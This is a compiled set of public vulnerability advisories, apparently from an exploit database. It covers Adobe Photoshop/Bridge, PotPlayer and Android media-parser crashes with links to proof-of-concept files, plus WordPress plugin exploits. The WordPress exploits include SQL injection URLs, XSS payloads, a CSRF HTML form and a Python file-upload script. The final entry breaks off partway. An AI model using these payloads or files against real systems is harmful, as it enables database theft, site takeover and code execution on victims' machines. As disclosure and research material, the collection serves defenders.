* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
#####################################################################################
Application: Adobe Photoshop CC & Bridge CC IFF file parsing memory corruption
Platforms: Windows
Versions: Bridge CC 6.1.1 and earlier versions
Version: Photoshop CC 16.1.1 (2015.1.1) and earlier versions
CVE; 2016-0953
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Photoshop is a raster graphics editor developed and published by Adobe Systems for Windows and OS X.
(https://en.wikipedia.org/wiki/Adobe_Photoshop)
#####################################################################################
============================
2) Report Timeline
============================
2015-11-11: Francis Provencher from COSIG report the issue to PSIRT (ADOBE);
2016-02-09: Adobe release a patch (APSB16-03);
2016-02-09: COSIG release this advisory;
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Photoshop CC & Bridge CC. User interaction is required to exploit this vulnerability in that the target must open a malicious file. By providing a malformed IFF file, an attacker can cause an heap memory corruption. An attacker could leverage this to execute arbitrary code under the context of the application.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2016-10.iff
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39431.zip
###############################################################################
#####################################################################################
Application: Adobe Photoshop CC & Bridge CC PNG file parsing memory corruption
Platforms: Windows
Versions: Bridge CC 6.1.1 and earlier versions
Version: Photoshop CC 16.1.1 (2015.1.1) and earlier versions
CVE; 2016-0952
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Photoshop is a raster graphics editor developed and published by Adobe Systems for Windows and OS X.
(https://en.wikipedia.org/wiki/Adobe_Photoshop)
#####################################################################################
============================
2) Report Timeline
============================
2015-11-11: Francis Provencher from COSIG report the issue to PSIRT (ADOBE);
2016-02-09: Adobe release a patch (APSB16-03);
2016-02-09: COSIG release this advisory;
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Photoshop CC & Bridge CC. User interaction is required to exploit this vulnerability in that the target must open a malicious file. By providing a malformed PNG file with an invialid uint32 CRC checksum, an attacker can cause an heap memory corruption. An attacker could leverage this to execute arbitrary code under the context of the application.
#####################################################################################
===========
4) POC
===========
(Theses files must be in the same folder for Bridge CC)
http://protekresearchlab.com/exploits/COSIG-2016-09-1.png
http://protekresearchlab.com/exploits/COSIG-2016-09-2.png
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39430.zip
###############################################################################
#####################################################################################
Application: Adobe Photoshop CC & Bridge CC PNG file parsing memory corruption
Platforms: Windows
Versions: Bridge CC 6.1.1 and earlier versions
Version: Photoshop CC 16.1.1 (2015.1.1) and earlier versions
CVE; 2016-0951
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Photoshop is a raster graphics editor developed and published by Adobe Systems for Windows and OS X.
(https://en.wikipedia.org/wiki/Adobe_Photoshop)
#####################################################################################
============================
2) Report Timeline
============================
2015-11-11: Francis Provencher from COSIG report the issue to PSIRT (ADOBE);
2016-02-09: Adobe release a patch (APSB16-03);
2016-02-09: COSIG release this advisory;
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Photoshop CC & Bridge CC. User interaction is required to exploit this vulnerability in that the target must open a malicious file. By providing a malformed PNG file with an invalid uint32 Length, an attacker can cause an heap memory corruption. An attacker could leverage this to execute arbitrary code under the context of the application.
#####################################################################################
===========
4) POC
===========
(Theses files must be in the same folder for Bridge CC)
http://protekresearchlab.com/exploits/COSIG-2016-08-1.png
http://protekresearchlab.com/exploits/COSIG-2016-08-2.png
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39429.zip
###############################################################################
# Exploit Title: POTPLAYER 1.6.5x MP3 CRASH POC
# Date: 08-02-2016
# Exploit Author: Shantanu Khandelwal
# Vendor Homepage: https://potplayer.daum.net/
# Software Link: (32-Bit) http://get.daum.net/PotPlayer/v3/PotPlayerSetup.exe
# Software Link: (64-Bit) http://get.daum.net/PotPlayer64/v3/PotPlayerSetup64.exe
# Version: 1.6.5x
# Tested on: Windows XP Sp3,Windows 8,Windows 10
# CVE : unknown at the moment
#============================================================================================
#Description: Read Access Violation on Block Data Mo#ve #Short Description:
ReadAVonBlockMove #Exploitability Classification: PROBABLY_EXPLOITABLE
#============================================================================================
#==================================================
#(8a4.d54): Access violation - code c0000005 (first chance) #First chance
exceptions are reported before any exception handling. #This exception may
be expected and handled. #eax=05d46659 ebx=05bb2998 ecx=00000011
edx=00000000 esi=05c68ffd edi=0012edd4 #eip=01b62e1e esp=0012e9dc
ebp=0363ad80 iopl=0 nv up ei pl nz ac po nc #cs=001b ss=0023 ds=0023
es=0023 fs=003b gs=0000 efl=00010212 #*** ERROR: Symbol file could not be
found. Defaulted to export symbols for C:\Program
Files\DAUM\PotPlayer\PotPlayer.dll -
#===========================================================
POTPLAYER has buffer overflow in png parser of image of MP3 offset 5B .
Crash is because of '\x22' at offset 5B
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39428.zip
source: http://www.securityfocus.com/archive/1/509995
======================================================================
Secunia Research 10/03/2010
- Employee Timeclock Software SQL Injection Vulnerabilities -
======================================================================
Table of Contents
Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10
======================================================================
1) Affected Software
* Employee Timeclock Software 0.99
NOTE: Other versions may also be affected.
======================================================================
2) Severity
Rating: Moderately critical
Impact: Manipulation of data
Where: Remote
======================================================================
3) Vendor's Description of Software
"Timeclock-software.net's free software product will be a simple
solution to allow your employees to record their time in one central
location for easy access.".
Product Link:
http://timeclock-software.net/
======================================================================
4) Description of Vulnerability
Secunia Research has discovered some vulnerabilities in Employee
Timeclock Software, which can be exploited by malicious people to
conduct SQL injection attacks.
Input passed to the "username" and "password" parameters in auth.php
and login_action.php is not properly sanitised before being used in
SQL queries. This can be exploited to manipulate SQL queries by
injecting arbitrary SQL code.
======================================================================
5) Solution
Edit the source code to ensure that input is properly sanitised.
======================================================================
6) Time Table
25/02/2010 - Vendor notified.
04/03/2010 - Vendor notified again.
10/03/2010 - Public disclosure.
======================================================================
7) Credits
Discovered by Secunia Research.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-0122 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-11/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
Source: https://code.google.com/p/google-security-research/issues/detail?id=634
The attached mp4 file causes stack corruption in Flash. To run the test, load LoadMP42.swf?file=null.mp4 from a remote server.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39426-1.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=616
The attached file causes memory corruption when iy is scanned by the face recognition library in android.media.process
F/libc ( 4134): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x33333333333358 in tid 12161 (syncThread)
I/DEBUG ( 3021): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 3021): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.1.1/LMY47X/G925VVRU4BOG9:user/release-keys'
I/DEBUG ( 3021): Revision: '10'
I/DEBUG ( 3021): ABI: 'arm64'
I/DEBUG ( 3021): pid: 4134, tid: 12161, name: syncThread >>> android.process.media <<<
I/DEBUG ( 3021): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x33333333333358
I/DEBUG ( 3021): x0 3333333333333330 x1 0000007f714b6800 x2 000000000000001f x3 3333333333333330
I/DEBUG ( 3021): x4 0000007f817fedb8 x5 0000007f7c1f4ea8 x6 0000007f7c1f4ec0 x7 0000007f7c109680
I/DEBUG ( 3021): x8 304b333333333333 x9 3033330333000000 x10 3333333333333333 x11 0103304b33333333
I/DEBUG ( 3021): x12 0000040033300311 x13 0300035033333333 x14 0300303333233333 x15 0000000000001484
I/DEBUG ( 3021): x16 0000007f74bfe828 x17 0000007f8c086008 x18 0000007f8c13b830 x19 0000007f7c279a00
I/DEBUG ( 3021): x20 0000000000000000 x21 0000007f7c1036a0 x22 0000007f817ff440 x23 0000007f7c279a10
I/DEBUG ( 3021): x24 0000000032d231a0 x25 0000000000000065 x26 0000000032d28880 x27 0000000000000065
I/DEBUG ( 3021): x28 0000000000000000 x29 0000007f817fecb0 x30 0000007f740be014
I/DEBUG ( 3021): sp 0000007f817fecb0 pc 0000007f740cefdc pstate 0000000080000000
I/DEBUG ( 3021):
I/DEBUG ( 3021): backtrace:
I/DEBUG ( 3021): #00 pc 0000000000065fdc /system/lib64/libfacerecognition.so (MdConvertLine+28)
I/DEBUG ( 3021): #01 pc 0000000000055010 /system/lib64/libfacerecognition.so (MCC_Process+160)
To reproduce, download the attached file and wait, or trigger media scanning by calling:
adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39425.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=617
The attached jpg causes an invalid pointer to be freed when media scanning occurs.
F/libc (11192): Fatal signal 11 (SIGSEGV), code 1, fault addr 0xffffffffffffb0 in tid 14368 (HEAVY#7)
I/DEBUG ( 3021): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 3021): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.1.1/LMY47X/G925VVRU4BOG9:user/release-keys'
I/DEBUG ( 3021): Revision: '10'
I/DEBUG ( 3021): ABI: 'arm64'
I/DEBUG ( 3021): pid: 11192, tid: 14368, name: HEAVY#7 >>> com.samsung.dcm:DCMService <<<
I/DEBUG ( 3021): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xffffffffffffb0
I/DEBUG ( 3021): x0 0000000000000002 x1 0000007f89fa9758 x2 00000000003fffff x3 0000000000000000
I/DEBUG ( 3021): x4 0000000000000000 x5 0000007f89f98000 x6 0000007f89fa9790 x7 0000000000000006
I/DEBUG ( 3021): x8 fffffffffffffffa x9 ffffffffffffffee x10 ffffffffffffff70 x11 0000007f7f000bb8
I/DEBUG ( 3021): x12 0000000000000014 x13 0000007f89f98000 x14 0000007f89fa5000 x15 0000004000000000
I/DEBUG ( 3021): x16 0000007f7eed6ba0 x17 0000007f89ef38fc x18 0000007f89fa9830 x19 0000000000000002
I/DEBUG ( 3021): x20 000000000000001f x21 0000007f89f98000 x22 00000000ffffffff x23 0000007f7f0647f8
I/DEBUG ( 3021): x24 0000007f71809b10 x25 0000000000000010 x26 0000000000000080 x27 fffffffffffffffc
I/DEBUG ( 3021): x28 0000007f7edf9dd0 x29 0000007f7edf9b50 x30 0000007f89ef3914
I/DEBUG ( 3021): sp 0000007f7edf9b50 pc 0000007f89f53b24 pstate 0000000020000000
I/DEBUG ( 3021):
I/DEBUG ( 3021): backtrace:
I/DEBUG ( 3021): #00 pc 0000000000079b24 /system/lib64/libc.so (je_free+92)
I/DEBUG ( 3021): #01 pc 0000000000019910 /system/lib64/libc.so (free+20)
I/DEBUG ( 3021): #02 pc 000000000003f8cc /system/lib64/libQjpeg.so (WINKJ_DeleteDecoderInfo+916)
I/DEBUG ( 3021): #03 pc 0000000000043890 /system/lib64/libQjpeg.so (WINKJ_DecodeImage+2852)
I/DEBUG ( 3021): #04 pc 00000000000439b4 /system/lib64/libQjpeg.so (WINKJ_DecodeFrame+88)
I/DEBUG ( 3021): #05 pc 0000000000043af0 /system/lib64/libQjpeg.so (QURAMWINK_DecodeJPEG+284)
I/DEBUG ( 3021): #06 pc 0000000000045ddc /system/lib64/libQjpeg.so (QURAMWINK_PDecodeJPEG+440)
I/DEBUG ( 3021): #07 pc 00000000000a24c0 /system/lib64/libQjpeg.so (QjpgDecodeFileOpt+432)
I/DEBUG ( 3021): #08 pc 0000000000001b98 /system/lib64/libsaiv_codec.so (saiv_codec_JpegCodec_decode_f2bRotate+40)
I/DEBUG ( 3021): #09 pc 0000000000001418 /system/lib64/libsaiv_codec.so (Java_com_samsung_android_saiv_codec_JpegCodec_decodeF2BRotate+268)
To reproduce, download the image file and wait, or trigger media scanning by calling:
adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39424.zip
# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Unauthenticated blind SQL injection
# Date: 2016-02-08
# Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Plugin URI: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Version: 1.0.23
# Tested on: windows 10 + firefox.
==============
Description
==============
Create a booking form with a reservation calendar or a classic contact form, connected to
a PayPal payment button.
With the **Booking Calendar Contact Form** you can create a **classic contact form** or a
**booking form with a reservation calendar**, connected to a PayPal payment button. The reservation
calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates.
The **reservation calendar** is an optional item, so it can be disabled to create a **general
purpose contact form**.
There are two types of bookings available in the calendar configuration: full day bookings or
partial day bookings. With full day bookings the whole day is blocked / reserved while in partial
day bookings the start and end dates are partially blocked as used for example in
**room/hotel bookings**.
===================
Technical details
===================
Booking calendar plugin is prone to a blind sql injection because fails to sanitize a
parameter used into a sql statement.
The function ´dex_bccf_get_option´ uses a variable called ´CP_BCCF_CALENDAR_ID´ which is not sanitized
and is used as value for the ´id´ of sql parameter.
The vulnerable function is called into many other functions, and one of those is ´dex_bccf_calendar_load2´
which sets the ´CP_BCCF_CALENDAR_ID´ with the following code:
""
$calid = str_replace(TDE_BCCFCAL_PREFIX, "", @$_GET["id"]);
if (!defined('CP_BCCF_CALENDAR_ID') && $calid != '-1')
define('CP_BCCF_CALENDAR_ID', $calid);
""
and then the function ´dex_bccf_get_option´ is called into ´dex_bccf_calendar_load2´ function:
"" ...
$option = dex_bccf_get_option('calendar_overlapped', DEX_BCCF_DEFAULT_CALENDAR_OVERLAPPED);
...
""
The ´dex_bccf_calendar_load2´ function is called when we request the next url:
http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent
&dex_bccf_calendar_load2=list&id=<SQLI commands>
A malicious unauthenticated user can exploit the sql injection and obtain all records from database.
==================
Proof of concept
==================
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent
&dex_bccf_calendar_load2=list&id=1%20and%20sleep(10)
###############################################################################
# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Unauthenticated blind SQL injection
# Date: 2016-02-08
# Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Plugin URI: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Version: 1.0.23
# Tested on: windows 10 + firefox.
==============
Description
==============
Create a booking form with a reservation calendar or a classic contact form, connected to
a PayPal payment button.
With the **Booking Calendar Contact Form** you can create a **classic contact form** or a
**booking form with a reservation calendar**, connected to a PayPal payment button. The reservation
calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates.
The **reservation calendar** is an optional item, so it can be disabled to create a **general
purpose contact form**.
There are two types of bookings available in the calendar configuration: full day bookings or
partial day bookings. With full day bookings the whole day is blocked / reserved while in partial
day bookings the start and end dates are partially blocked as used for example in
**room/hotel bookings**.
===================
Technical details
===================
Booking calendar plugin is prone to a blind sql injection in the shortcode function ´dex_bccf_filter_content´
because there is not sanitization when the variable ´DEX_BCCF_CALENDAR_FIXED_ID´ is asigned and then is used
into function ´dex_bccf_get_public_form()´.
function dex_bccf_filter_content($atts) {
...
extract(shortcode_atts(array(
'calendar' => '',
'user' => '',
), $atts));
if ($calendar != '')
define('DEX_BCCF_CALENDAR_FIXED_ID', $calendar);
..
return $buffered_contents;
}
function dex_bccf_get_public_form() {
global $wpdb;
if (defined('DEX_CALENDAR_USER') && DEX_CALENDAR_USER != 0)
$myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME . " WHERE conwer=" . DEX_CALENDAR_USER);
else if (defined('DEX_BCCF_CALENDAR_FIXED_ID'))
$myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME . " WHERE id=" . DEX_BCCF_CALENDAR_FIXED_ID);
else
$myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME);
...
}
==================
Proof of concept
==================
An editor/author can add a ahortcode with his sql command into a post:
[CP_BCCF_FORM calendar=-1 or sleep(10)#]
###############################################################################
# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Privilege escalation / stored XSS vulnerabilities
# Date: 2016-02-08
# Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Plugin URI: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Version: 1.0.23
# Tested on: windows 10 + firefox.
==============
Description
==============
Create a booking form with a reservation calendar or a classic contact form, connected to
a PayPal payment button.
With the **Booking Calendar Contact Form** you can create a **classic contact form** or a
**booking form with a reservation calendar**, connected to a PayPal payment button. The reservation
calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates.
The **reservation calendar** is an optional item, so it can be disabled to create a **general
purpose contact form**.
There are two types of bookings available in the calendar configuration: full day bookings or
partial day bookings. With full day bookings the whole day is blocked / reserved while in partial
day bookings the start and end dates are partially blocked as used for example in
**room/hotel bookings**.
===================
Technical details
===================
Booking calendar contact form plugin for wordpress is prone to multiple privilege escalation and stored XSS
vulnerabilities because does not verify if a user that make a request for update the plugin options,
add or delete a ´season price´ and add/delete/update an item to booking list is a privileged user and does not
sanitize the supplied information.
An authenticated user can exploit these vulnerabilities.
==================
Proof of concept
==================
1) Add a ´season price´ with XSS Payload in parameter ´price´.
http://<wp-path>/<ap-path>/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices
&add=1&dex_item=1&price=%3E%22%3Cimg%20src=x%20onerror=alert(/u_r_owned/)%3E%22%3C&dfrom=&dto
2) Delete a ´season price´ with specified ´code´
http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data
&dex_bccf=loadseasonprices&delete=1&code=1
3) Own a calendars if you have an account like ´suscriptor´ role and inject a XSS payload into ´name parameter´:
http://<wp-hots>/<wp-path>/wp-admin/admin.php?page=dex_bccf.php&u=<my user id>&public=1&owner=1&name=<XSS payload>
4) Update charset of booking calendar tables:
http://<wp-host>/<wp-path>/wp-admin/admin.php?page=dex_bccf.php&ac=st&chs=<my supplied charset>
5) Delete a booking calendar item if you are logged in as suscriptor:
http://localhost/wordpress/wp-admin/admin.php?page=dex_bccf.php&cal=1&list=1&ld=<id of calendar to delete>
6) Unrestricted update options / stored XSS in some parameters ( PoC html )
<html>
<!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin
email_confirmation_to_user,calendar_language,calendar_mode,calendar_pages,currency,cv_text_enter_valid_captcha
and other parameters are vulnerables to stored XSS
url_ok,url_cancel can be used to redirect a user and make fishing attacks
´dex_item´ value is the ´id´ of the calendar.
-->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost:80/wordpress/wp-admin/admin.php?page=dex_bccf.php&cal=1&r=0.5076911114737157", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1");
xhr.withCredentials = true;
var body = "dex_bccf_post_options=1&dex_item=1&calendar_enabled=true&selDay_startcal1=&selMonth_startcal1=&selYear_startcal1=&selDay_endcal1=&selMonth_endcal1=&selYear_endcal1=\">\"<img><\"&calendar_pages=2&calendar_language=\">\"<img><\"&calendar_weekday=0&calendar_dateformat=0&calendar_overlapped=false&calendar_showcost=1&calendar_mode=\">\"<img><\"&calendar_mindate=today&calendar_maxdate=\">\"<img><\"&calendar_minnights=%22%3E%22%3Cimg%3E%3C%22&calendar_maxnights=%22%3E%22%3Cimg%3E%3C%22&wd1=1&wd2=1&wd3=1&wd4=1&wd5=1&wd6=1&wd7=1&sd1=1&sd2=1&sd3=1&sd4=1&sd5=1&sd6=1&sd7=1&calendar_fixedreslength=1&calendar_holidays=&calendar_startres=¤cy=%22%3E%22%3Cimg%3E%3C%22&request_cost=%22%3E%22%3Cimg%3E%3C%22&max_slots=0&calendar_suplementminnight=%22%3E%22%3Cimg%3E%3C%22&calendar_suplementmaxnight=%22%3E%22%3Cimg%3E%3C%22&calendar_suplement=%22%3E%22%3Cimg%3E%3C%22&calendar_depositenable=0&calendar_depositamount=0&calendar_deposittype=0&dex_dc_price=%22%3E%22%3Cimg%3E%3C%22&dex_dc_season_dfrom=%22%3E%22%3Cimg%3E%3C%22&dex_dc_season_dto=%22%3E%22%3Cimg%3E%3C%22&paypal_email=%22%3E%22%3Cimg%3E%3C%22%40email_here.com&paypal_product_name=%22%3E%22%3Cimg%3E%3C%22&url_ok=http%3A%2F%2Flocalhost%2Fwordpress&url_cancel=http%3A%2F%2Flocalhost%2Fwordpress&paypal_language=%22%3E%22%3Cimg%3E%3C%22&request_taxes=%22%3E%22%3Cimg%3E%3C%22&form_structure=%5B%5B%7B%22name%22%3A%22email%22%2C%22index%22%3A0%2C%22title%22%3A%22Email%22%2C%22ftype%22%3A%22femail%22%2C%22userhelp%22%3A%22%22%2C%22csslayout%22%3A%22%22%2C%22required%22%3Atrue%2C%22predefined%22%3A%22%22%2C%22size%22%3A%22medium%22%7D%2C%7B%22name%22%3A%22subject%22%2C%22index%22%3A1%2C%22title%22%3A%22Subject%22%2C%22required%22%3Atrue%2C%22ftype%22%3A%22ftext%22%2C%22userhelp%22%3A%22%22%2C%22csslayout%22%3A%22%22%2C%22predefined%22%3A%22%22%2C%22size%22%3A%22medium%22%7D%2C%7B%22name%22%3A%22message%22%2C%22index%22%3A2%2C%22size%22%3A%22large%22%2C%22required%22%3Atrue%2C%22title%22%3A%22Message%22%2C%22ftype%22%3A%22ftextarea%22%2C%22userhelp%22%3A%22%22%2C%22csslayout%22%3A%22%22%2C%22predefined%22%3A%22%22%7D%5D%2C%5B%7B%22title%22%3A%22%22%2C%22description%22%3A%22%22%2C%22formlayout%22%3A%22top_aligned%22%7D%5D%5D&sTitle=Email&sShortlabel=&sNametag=%3C%25email%25%3E&sName=email&sSize=medium&sRequired=on&sEqualTo=&sPredefined=&sUserhelp=&sCsslayout=&vs_text_submitbtn=%22%3E%22%3Cimg%3E%3C%22&vs_text_previousbtn=%22%3E%22%3Cimg%3E%3C%22&vs_text_nextbtn=%22%3E%22%3Cimg%3E%3C%22&vs_use_validation=DEX_BCCF_DEFAULT_vs_use_validation&vs_text_is_required=This+field+is+required.&vs_text_is_email=%22%3E%22%3Cimg%3E%3C%22%40mail.com&cv_text_enter_valid_captcha=Please+enter+a+valid+captcha+code.&vs_text_datemmddyyyy=%22%3E%22%3Cimg%3E%3C%22&vs_text_dateddmmyyyy=%22%3E%22%3Cimg%3E%3C%22&vs_text_number=%22%3E%22%3Cimg%3E%3C%22&vs_text_digits=%22%3E%22%3Cimg%3E%3C%22&vs_text_max=%22%3E%22%3Cimg%3E%3C%22&vs_text_min=%22%3E%22%3Cimg%3E%3C%22&cp_cal_checkboxes_type1=0&cp_cal_checkboxes1=¬ification_from_email=%22%3E%22%3Cimg%3E%3C%22%40email_here.com¬ification_destination_email=%22%3E%22%3Cimg%3E%3C%22%40email_here.com&email_subject_notification_to_admin=%22%3E%22%3Cimg%3E%3C%22&email_notification_to_admin=New+reservation+made+with+the+following+information%3A%0D%0A%0D%0A%22%3E%22%3Cimg%3E%3C%22%0D%0A%0D%0ABest+regards.&cu_user_email_field=email&email_subject_confirmation_to_user=%22%3E%22%3Cimg%3E%3C%22&email_confirmation_to_user=We+have+received+your+request+with+the+following+information%3A%0D%0A%0D%0A%25INFORMATION%25%0D%0A%0D%0A%22%3E%22%3Cimg%3E%3C%22%0D%0A%0D%0ABest+regards.&dexcv_enable_captcha=true&dexcv_width=%22%3E%22%3Cimg%3E%3C%22&dexcv_height=%22%3E%22%3Cimg%3E%3C%22&dexcv_chars=%22%3E%22%3Cimg%3E%3C%22&dexcv_min_font_size=%22%3E%22%3Cimg%3E%3C%22&dexcv_max_font_size=%22%3E%22%3Cimg%3E%3C%22&dexcv_noise=%22%3E%22%3Cimg%3E%3C%22&dexcv_noise_length=%22%3E%22%3Cimg%3E%3C%22&dexcv_background=%22%3E%22%3Cimg%3E%3C%22&dexcv_border=%22%3E%22%3Cimg%3E%3C%22&dexcv_font=font-1.ttf&submit=Save+Changes";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
==========
CREDITS
==========
Vulnerability discovered by:
Joaquin Ramirez Martinez [i0 security-lab]
joaquin.ramirez.mtz.lab[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
========
TIMELINE
========
2016-02-01 vulnerability discovered
2016-02-05 reported to vendor
2016-02-08 released fixed plugin v1.0.24
2016-02-08 public disclosure
'''
* Exploit Title: WordPress WP User Frontend Plugin [Unrestricted File Upload]
* Discovery Date: 2016-02-04
* Public Disclosure: 2016-02-08
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: https://wedevs.com
* Software Link: https://wordpress.org/plugins/wp-user-frontend
* Version: < 2.3.11
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress
Description
-----------
WordPress plugin _WP User Frontend_ suffers from an unrestricted file uploade vulnerability. An attacker can exploit the `wpuf_file_upload` or `wpuf_insert_image` actions to upload any file which pass the WordPress mime and size checks.
The attack does not require any privilege to be performed. The mentioned actions are available to non-privileged users also, thus allowing to anyone uploading files to the web server.
PoC
---
'''
#!/usr/bin/python3
################################################################################
# WP User Frontend unrestricted file upload exploit
#
# Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
################################################################################
import requests
import tempfile
url = 'http://example.com/wp-admin/admin-ajax.php'
postData = {
'action': 'wpuf_file_upload'
}
file = tempfile.NamedTemporaryFile(mode='a+t', suffix='.jpeg')
file.write('A'*32)
file.seek(0)
files = {'wpuf_file': file}
r = requests.post(url, data=postData, files=files)
file.close()
if r.text != 'error':
print('Success!')
print(r.text)
else:
print('error')
exit(0)
'''
Timeline
--------
1. **2016-02-04**: Vendor notified via support forums in WordPress.org
2. **2016-02-05**: Vendor responded
3. **2016-02-05**: Issue details send to vendor
4. **2016-02-06**: Requested CVE ID
5. **2016-02-06**: Vendor implemented security checks
6. **2016-02-06**: Verified that this exploit is no longer valid
7. **2016-02-08**: Vendor released v2.3.11 which resolves this issue
'''
'''
* Exploit Title: WordPress WooCommerce - Store Toolkit Plugin [Privilege Escalation]
* Discovery Date: 2016-02-06
* Public Disclosure Date: 2016-02-08
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://www.visser.com.au/
* Software Link: https://wordpress.org/plugins/woocommerce-store-toolkit/
* Version: 1.5.5
* Tested on: WordPress 4.4.2
* Category: webapps
Description
-----------
The plugin "WooCommerce - Store Toolkit" for WordPress suffers from a privilege escalation vulnerability.
An attacker must have a valid user account which is possible simply by registering to the infected website. This is possible because this plugin must be installed in a website with WooCommerce plugin to be any of use. Since WooCommerce is an e-store plugin allows user registration by default, so we assume that all websites that have the "WooCommerce - Store Toolkit" plugin are also open to user registration.
As long as an attacker have an active account at the infected website he can perform the attack at ease because no action validation is taking place from the "WooCommerce - Store Toolkit" plugin. The "WooCommerce - Store Toolkit" plugin is designed to perform a set of actions like:
- Permanently delete all posts, post categories and post tags
- Permanently delete all media (attachments)
- Permanently delete all products, product categories, product tags and attributes
